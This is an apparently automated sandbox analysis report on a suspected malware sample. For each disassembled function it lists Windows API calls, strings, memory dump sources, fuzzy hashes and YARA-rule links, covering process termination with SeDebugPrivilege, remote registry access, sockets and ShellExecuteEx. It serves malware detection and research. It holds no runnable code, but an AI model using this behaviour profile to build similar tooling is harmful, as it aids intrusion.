                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 1957940570-0
                                                                                  • Opcode ID: b38a75a91d4b8e9806bdf19508952b1e99d85e296cd7507322d6e0517cd0c372
                                                                                  • Instruction ID: 8bb0eeeeb6c991980c8a7360a93a322ee1344dd5907aceb7a8b8546062f2308c
                                                                                  • Opcode Fuzzy Hash: b38a75a91d4b8e9806bdf19508952b1e99d85e296cd7507322d6e0517cd0c372
                                                                                  • Instruction Fuzzy Hash: B001E4B5240308BFE610AFA5EC49F6B3BBCEF98700F008411FA08CB1A1CA719844EB31
                                                                                  Function 0054C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                  • API String ID: 0-572801152
                                                                                  • Opcode ID: 9beff7891908bb74c79f9fabf656be7b7c71afcbeb77e09c4aec8a04ce4516fb
                                                                                  • Instruction ID: 606991305a6a60fe11a1456cc33c9cee9c425973a3df0742a30cc3e1af141c04
                                                                                  • Opcode Fuzzy Hash: 9beff7891908bb74c79f9fabf656be7b7c71afcbeb77e09c4aec8a04ce4516fb
                                                                                  • Instruction Fuzzy Hash: 61E1C571A0121AABDF54DFA8D885AEE7FB5FF88318F148429F905A7281D770AD41CB90
                                                                                  Function 005416DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                  • _wcstok.LIBCMT ref: 0054184E
                                                                                  • _wcscpy.LIBCMT ref: 005418DD
                                                                                  • _memset.LIBCMT ref: 00541910
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                  • String ID: X$p2Zl2Z
                                                                                  • API String ID: 774024439-2338586027
                                                                                  • Opcode ID: 54f71046e42e2de1bb2e7bf06705b5bf5208eebe89c386967f5d20be4d89964e
                                                                                  • Instruction ID: bcf234875e80411099fb9fd7a64bcc6a727805b68666156d5fa80cbd20709817
                                                                                  • Opcode Fuzzy Hash: 54f71046e42e2de1bb2e7bf06705b5bf5208eebe89c386967f5d20be4d89964e
                                                                                  • Instruction Fuzzy Hash: 50C1C3355047459FC714EF25C985AAEBBE0FF85358F00496EF989972A2DB30EC44CB8A
                                                                                  Function 00559A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00559B19
                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00559B2D
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00559B47
                                                                                  • _wcscat.LIBCMT ref: 00559BA2
                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00559BB9
                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00559BE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                  • String ID: SysListView32
                                                                                  • API String ID: 307300125-78025650
                                                                                  • Opcode ID: b76a1c7ae0179f38d8e4ba9e4fd336c6b23cc8331303361fda4bbc1afed5f42d
                                                                                  • Instruction ID: 1e0b5baee73d3021404d18e9d14f3ddbff505fea63437caf0ae440c3351c2aa0
                                                                                  • Opcode Fuzzy Hash: b76a1c7ae0179f38d8e4ba9e4fd336c6b23cc8331303361fda4bbc1afed5f42d
                                                                                  • Instruction Fuzzy Hash: 6041C571900308EFEB219FA4DC95BEE7BB8FF48351F10042AF949A7191C6759D88DB60
                                                                                  Function 0055172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00536532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00536554
                                                                                    • Part of subcall function 00536532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00536564
                                                                                    • Part of subcall function 00536532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 005365F9
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0055179A
                                                                                  • GetLastError.KERNEL32 ref: 005517AD
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005517D9
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00551855
                                                                                  • GetLastError.KERNEL32(00000000), ref: 00551860
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00551895
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                  • String ID: SeDebugPrivilege
                                                                                  • API String ID: 2533919879-2896544425
                                                                                  • Opcode ID: 307eb70118e6431193b18f89d25abd2f62798b546c916a642036363cc4c0416c
                                                                                  • Instruction ID: 5331734df18cdefa7718bc18793b28283f84b652b97d5f95043f6ce9db4ad841
                                                                                  • Opcode Fuzzy Hash: 307eb70118e6431193b18f89d25abd2f62798b546c916a642036363cc4c0416c
                                                                                  • Instruction Fuzzy Hash: 0741CC71600201AFDB15EF54C8A9F6DBFB1BF94301F04849AF9069F2C2DB74A948CB55
                                                                                  Function 00535819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 005358B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoad
                                                                                  • String ID: blank$info$question$stop$warning
                                                                                  • API String ID: 2457776203-404129466
                                                                                  • Opcode ID: 2154c857eac33668ab16bb0000096e57a8db253e1e5e67f73609ab529dd48836
                                                                                  • Instruction ID: 36249dd19e726c68e9bfae8abbdf06fdd7ab02dbd10e873c339de73803d6e95e
                                                                                  • Opcode Fuzzy Hash: 2154c857eac33668ab16bb0000096e57a8db253e1e5e67f73609ab529dd48836
                                                                                  • Instruction Fuzzy Hash: EA110D31609753FAE7055B549C83DAEAFECBF65314F30103AF501E62C1F7B0AA814264
                                                                                  Function 0053A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0053A806
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafeVartype
                                                                                  • String ID:
                                                                                  • API String ID: 1725837607-0
                                                                                  • Opcode ID: 53864ced5aff03b368e47d988454a225bee373dc49badad8c14177bef4b37518
                                                                                  • Instruction ID: 76425fbae94a74c5deed4a63a91e4e3bc6acdfb8b383b175ef9220c73578c780
                                                                                  • Opcode Fuzzy Hash: 53864ced5aff03b368e47d988454a225bee373dc49badad8c14177bef4b37518
                                                                                  • Instruction Fuzzy Hash: 64C1AF72A0020ADFDB10CF98D485BAEBBF4FF08311F204469E685E7281D775AA45CF91
                                                                                  Function 00536B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00536B63
                                                                                  • LoadStringW.USER32(00000000), ref: 00536B6A
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00536B80
                                                                                  • LoadStringW.USER32(00000000), ref: 00536B87
                                                                                  • _wprintf.LIBCMT ref: 00536BAD
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00536BCB
                                                                                  Strings
                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00536BA8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                  • API String ID: 3648134473-3128320259
                                                                                  • Opcode ID: a22e63e3ac122b9b9def29a7e0bf948e1eb63e708b79aa7487a7cfdc2d188062
                                                                                  • Instruction ID: a544bf33928fc8623d58f84b80b9de588fba924b01182e792b3b7389be6d74cd
                                                                                  • Opcode Fuzzy Hash: a22e63e3ac122b9b9def29a7e0bf948e1eb63e708b79aa7487a7cfdc2d188062
                                                                                  • Instruction Fuzzy Hash: F70136F65002087FEB11AB94AD89EF7777CEB04304F404495B749E6041EA749EC8AF74
                                                                                  Function 00552B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00553C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00552BB5,?,?), ref: 00553C1D
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00552BF6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                                  • String ID:
                                                                                  • API String ID: 2595220575-0
                                                                                  • Opcode ID: 5688e89b87e103dc6b2bacb1a8bacab55c69c12a8bcf1c00444e8be7fadc5e3e
                                                                                  • Instruction ID: 1e296c95e2f2e4b4992a8dd3b7805eb599034543506a19cc46376508b461c0d8
                                                                                  • Opcode Fuzzy Hash: 5688e89b87e103dc6b2bacb1a8bacab55c69c12a8bcf1c00444e8be7fadc5e3e
                                                                                  • Instruction Fuzzy Hash: E8918931204205AFCB00EF15C895B6EBBF5FF89315F04881EF996972A2DB34E949DB42
                                                                                  Function 005495BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • select.WSOCK32 ref: 00549691
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0054969E
                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 005496C8
                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005496E9
                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 005496F8
                                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 005497AA
                                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0058DC00), ref: 00549765
                                                                                    • Part of subcall function 0052D2FF: _strlen.LIBCMT ref: 0052D309
                                                                                  • _strlen.LIBCMT ref: 00549800
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                  • String ID:
                                                                                  • API String ID: 3480843537-0
                                                                                  • Opcode ID: 5264eb550586fad9ccf9d35d7f26827884f9f78441f87a19ae19b4089e60c018
                                                                                  • Instruction ID: d6e66d844ba10d31bbdf1aa17479d70f457fba6354c646f2c88f30cd93b8fde0
                                                                                  • Opcode Fuzzy Hash: 5264eb550586fad9ccf9d35d7f26827884f9f78441f87a19ae19b4089e60c018
                                                                                  • Instruction Fuzzy Hash: F881CC31504204ABC714EF65DC86EABBBA8FFC5718F104A1EF5559B291EB30E904CBA6
                                                                                  Function 0051A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __mtinitlocknum.LIBCMT ref: 0051A991
                                                                                    • Part of subcall function 00517D7C: __FF_MSGBANNER.LIBCMT ref: 00517D91
                                                                                    • Part of subcall function 00517D7C: __NMSG_WRITE.LIBCMT ref: 00517D98
                                                                                    • Part of subcall function 00517D7C: __malloc_crt.LIBCMT ref: 00517DB8
                                                                                  • __lock.LIBCMT ref: 0051A9A4
                                                                                  • __lock.LIBCMT ref: 0051A9F0
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,005A6DE0,00000018,00525E7B,?,00000000,00000109), ref: 0051AA0C
                                                                                  • EnterCriticalSection.KERNEL32(8000000C,005A6DE0,00000018,00525E7B,?,00000000,00000109), ref: 0051AA29
                                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 0051AA39
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 1422805418-0
                                                                                  • Opcode ID: cb5dad541bfd16a0065e85df2db6df5b8e649f6b6789af88861d3c74cb92bf6a
                                                                                  • Instruction ID: f8c18c95ad388cb179139a2d4b9d6fb7ae0b7d98a61c953bc4eb5e257f6fbfa9
                                                                                  • Opcode Fuzzy Hash: cb5dad541bfd16a0065e85df2db6df5b8e649f6b6789af88861d3c74cb92bf6a
                                                                                  • Instruction Fuzzy Hash: D6415671A022069BFB219F68DA447ECBFB0BF41334F148318E429AB2D1D77498C4CB92
                                                                                  Function 00558ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 00558EE4
                                                                                  • GetDC.USER32(00000000), ref: 00558EEC
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00558EF7
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00558F03
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00558F3F
                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00558F50
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0055BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00558F8A
                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00558FAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3864802216-0
                                                                                  • Opcode ID: 480ba72c5916a3f68e6883d9d6ac5540553df2eb5f8887e502f2317da649fa1a
                                                                                  • Instruction ID: 7e0054aee645cfc7347c0418cd4157c4e8a2518b114785d2bd0a8e2e3374c471
                                                                                  • Opcode Fuzzy Hash: 480ba72c5916a3f68e6883d9d6ac5540553df2eb5f8887e502f2317da649fa1a
                                                                                  • Instruction Fuzzy Hash: 6B315C72200214BFEB108F50DC4AFEA3FB9FF59716F044065FE08AA191D6759845DB70
                                                                                  Function 00560133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 0056016D
                                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0056038D
                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 005603AB
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 005603D6
                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 005603FF
                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00560421
                                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00560440
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                  • String ID:
                                                                                  • API String ID: 3356174886-0
                                                                                  • Opcode ID: a4d9bdb475b131ee47a8a1a2bdc1ab0a06ca3bc122a08e3df2dc82ea377f7408
                                                                                  • Instruction ID: a3ab75a56bfa0b635857709bf42b81af3bf9993a4092cb6df96c0efd55482ef9
                                                                                  • Opcode Fuzzy Hash: a4d9bdb475b131ee47a8a1a2bdc1ab0a06ca3bc122a08e3df2dc82ea377f7408
                                                                                  • Instruction Fuzzy Hash: 77A1AB35600616EBDF18CF68C9997BEBBB1FF48701F149215EC58AB290DB34AD90DB90
                                                                                  Function 0050AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 615a1e5cb8fb1f28c0f21e325640712c2eeb433d8f115619668df892410ee478
                                                                                  • Instruction ID: 923e63719a463c7ce7b1b043e2ceb859467f14404a20482232f99b038b666685
                                                                                  • Opcode Fuzzy Hash: 615a1e5cb8fb1f28c0f21e325640712c2eeb433d8f115619668df892410ee478
                                                                                  • Instruction Fuzzy Hash: 69716BB490020AEFDB04CF98CC89EAEBF79FF85310F148549F915AB290D730AA41DB61
                                                                                  Function 00552230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0055225A
                                                                                  • _memset.LIBCMT ref: 00552323
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00552368
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0055242F
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0055243E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                  • String ID: @
                                                                                  • API String ID: 4082843840-2766056989
